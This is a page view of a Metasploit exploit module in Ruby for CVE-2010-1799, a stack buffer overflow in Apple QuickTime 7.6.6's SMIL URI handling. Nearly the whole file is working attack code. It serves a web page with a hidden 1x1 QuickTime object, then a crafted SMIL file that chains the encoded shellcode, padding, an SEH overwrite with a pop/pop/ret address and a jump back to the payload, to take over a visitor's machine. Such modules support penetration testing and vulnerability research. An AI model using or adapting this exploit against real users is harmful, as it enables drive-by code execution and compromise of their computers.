Path: blob/master/modules/exploits/windows/browser/apple_quicktime_smil_debug.rb
19511 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking # needs more testing/targets to be Great78include Msf::Exploit::Remote::HttpServer::HTML9include Msf::Exploit::Seh1011# include Msf::Exploit::Remote::BrowserAutopwn12# autopwn_info({13# :os_name => OperatingSystems::Match::WINDOWS,14# :javascript => true,15# :rank => NormalRanking, # reliable memory corruption16# :vuln_test => nil,17# })1819def initialize(info = {})20super(21update_info(22info,23'Name' => 'Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow',24'Description' => %q{25This module exploits a buffer overflow in Apple QuickTime267.6.6. When processing a malformed SMIL uri, a stack-based buffer27overflow can occur when logging an error message.28},29'Author' => [30'Krystian Kloskowski', # original discovery31'jduck' # Metasploit module32],33'License' => MSF_LICENSE,34'References' => [35[ 'CVE', '2010-1799' ],36[ 'OSVDB', '66636'],37[ 'BID', '41962' ],38[ 'URL', 'http://web.archive.org/web/20100729143247/http://secunia.com:80/advisories/40729' ],39[ 'URL', 'http://support.apple.com/kb/HT4290' ]40],41'DefaultOptions' => {42'EXITFUNC' => 'process',43'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',44},45'Payload' => {46'Space' => 640, # 716 - 63 - 8 - 547'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40\x5c",48},49'Platform' => 'win',50'Targets' => [51# [ 'Automatic', { } ],52[53'Apple QuickTime Player 7.6.6',54{55'Ret' => 0x66801042 # p/p/r from QuickTime.qts (v7.66.71.0)56}57],58],59'Privileged' => false,60'DisclosureDate' => '2010-08-12',61'DefaultTarget' => 0,62'Notes' => {63'Reliability' => UNKNOWN_RELIABILITY,64'Stability' => UNKNOWN_STABILITY,65'SideEffects' => UNKNOWN_SIDE_EFFECTS66}67)68)69end7071def on_request_uri(client, request)72return if ((p = regenerate_payload(client)) == nil)7374if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.smil$/)75print_status("Sending exploit SMIL (target: #{target.name})")7677# This is all basically filler on the browser target because we can't78# expect the SEH to be in a reliable place across multiple browsers.79# Heap spray ftw.8081off = 71682start = "cHTTPDhlr_SetURL - url doesn't start with http:// or http1:// '"8384scheme = rand_text_alphanumeric(5)8586sploit = ''87sploit << scheme88sploit << "://"8990# payload91sploit << p.encoded9293# pad to SEH94sploit << rand_text_english(off - sploit.length - start.length)9596# seh frame97sploit << generate_seh_record(target.ret)9899# jmp back to payload100distance = off + 8 - (8 + start.length)101sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + distance.to_s).encode_string102103# force exception while writing104sploit << rand_text(1024) * 15105106smil = %Q|<smil xmlns="http://www.w3.org/2001/SMIL20/Language">107<body>108<img src="#{sploit}" />109</body>110</smil>111|112send_response(client, smil, { 'Content-Type' => "application/smil" })113114else115print_status("Sending initial HTML")116117shellcode = Rex::Text.to_unescape(p.encoded)118url = ((datastore['SSL']) ? "https://" : "http://")119url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])120url << ":" + datastore['SRVPORT'].to_s121url << get_resource122123fname = rand_text_alphanumeric(4)124125content = "<html><body>"126content << <<-ENDEMBED127<OBJECT128CLASSID="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B"129WIDTH="1"130HEIGHT="1"131CODEBASE="http://www.apple.com/qtactivex/qtplugin.cab">132<PARAM name="SRC" VALUE = "#{url}/#{fname}.smil">133<PARAM name="QTSRC" VALUE = "#{url}/#{fname}.smil">134<PARAM name="AUTOPLAY" VALUE = "true" >135<PARAM name="TYPE" VALUE = "video/quicktime" >136<PARAM name="TARGET" VALUE = "myself" >137<EMBED138SRC = "#{url}/#{fname}.qtl"139QTSRC = "#{url}/#{fname}.qtl"140TARGET = "myself"141WIDTH = "1"142HEIGHT = "1"143AUTOPLAY = "true"144PLUGIN = "quicktimeplugin"145TYPE = "video/quicktime"146CACHE = "false"147PLUGINSPAGE= "http://www.apple.com/quicktime/download/" >148</EMBED>149</OBJECT>150ENDEMBED151content << "</body></html>"152153send_response(client, content, { 'Content-Type' => "text/html" })154end155156# Handle the payload157handler(client)158end159end160161162